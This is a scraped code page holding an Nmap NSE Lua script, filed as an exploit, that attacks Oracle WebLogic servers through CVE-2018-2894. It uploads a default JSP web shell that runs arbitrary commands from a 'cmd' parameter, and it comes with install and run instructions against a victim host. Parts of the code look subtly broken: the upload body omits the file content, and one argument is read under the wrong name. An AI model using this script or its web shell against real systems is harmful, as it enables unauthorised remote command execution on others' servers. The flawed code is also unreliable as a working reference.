88 lines
3.3 KiB
Lua
88 lines
3.3 KiB
Lua
local http = require "http"
|
|
local nmap = require "nmap"
|
|
local stdnse = require "stdnse"
|
|
description = [[
|
|
Weblogic CVE-2018-2894
|
|
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
|
|
$ cd /nse_vuln/
|
|
$ sudo cp * /usr/share/nmap/scripts/
|
|
$ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host
|
|
]]
|
|
---
|
|
-- @usage
|
|
-- nmap -sV --script weblogic-cve-2018-2894 <target> -p 7001
|
|
-- nmap -sV --script weblogic-cve-2018-2894
|
|
-- --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' <target> -p 7001
|
|
--
|
|
-- @output
|
|
-- PORT STATE SERVICE
|
|
-- 7001/tcp open afs3-callback
|
|
-- | weblogic-upload:
|
|
-- |_ url: /ws_utc/config/keystore/1532325925_Nmap.jsp
|
|
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
|
|
--
|
|
--
|
|
-- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default /
|
|
-- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded
|
|
-- @args weblogic-cve-2018-2894.content file's contents
|
|
-- Other useful arguments when using this script are:
|
|
-- * http.useragent = String - User Agent used in HTTP requests
|
|
|
|
author = "Rvn0xsy <payloads@aliyun.com>"
|
|
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
|
|
categories = {"exploit"}
|
|
|
|
|
|
portrule = function(host,port)
|
|
if(port.number == 7001)then
|
|
return true
|
|
end
|
|
return false
|
|
|
|
end
|
|
|
|
add_formData = function(form,boundary)
|
|
local contents = "\r\n"
|
|
for key,value in pairs(form) do
|
|
contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary)
|
|
end
|
|
-- return contents.."--\r\n"
|
|
return contents
|
|
end
|
|
|
|
add_fileData = function(file,boundary)
|
|
return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary)
|
|
end
|
|
|
|
action = function(host,port)
|
|
form = {}
|
|
file = {}
|
|
shell = {}
|
|
form["ks_name"] = "Exploit CVE-2018-2894"
|
|
form["ks_edit_mode"] = "false"
|
|
form["ks_password_front"] = "123456"
|
|
form["ks_password"] = "123456"
|
|
form["ks_password_changed"] = "true"
|
|
file["name"]="ks_filename"
|
|
file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
|
|
file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
|
|
time = os.time()
|
|
uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/"
|
|
boundary = "-ABC"
|
|
ks_name = "Exploit CVE-2018-2894"
|
|
filename = time.."_"..file["filename"]
|
|
post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
|
|
options = {}
|
|
options.header = {}
|
|
options.content = "\r\n--"..boundary
|
|
options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
|
|
options.content = options.content .. add_formData(form,boundary)
|
|
options.content = options.content .. add_fileData(file,boundary)
|
|
resp = http.post(host,port,post_url,options,nil,nil)
|
|
if(resp.status == 200)then
|
|
shell["url"] = uri .. "ws_utc/config/keystore/"..filename
|
|
return shell
|
|
end
|
|
return false
|
|
end
|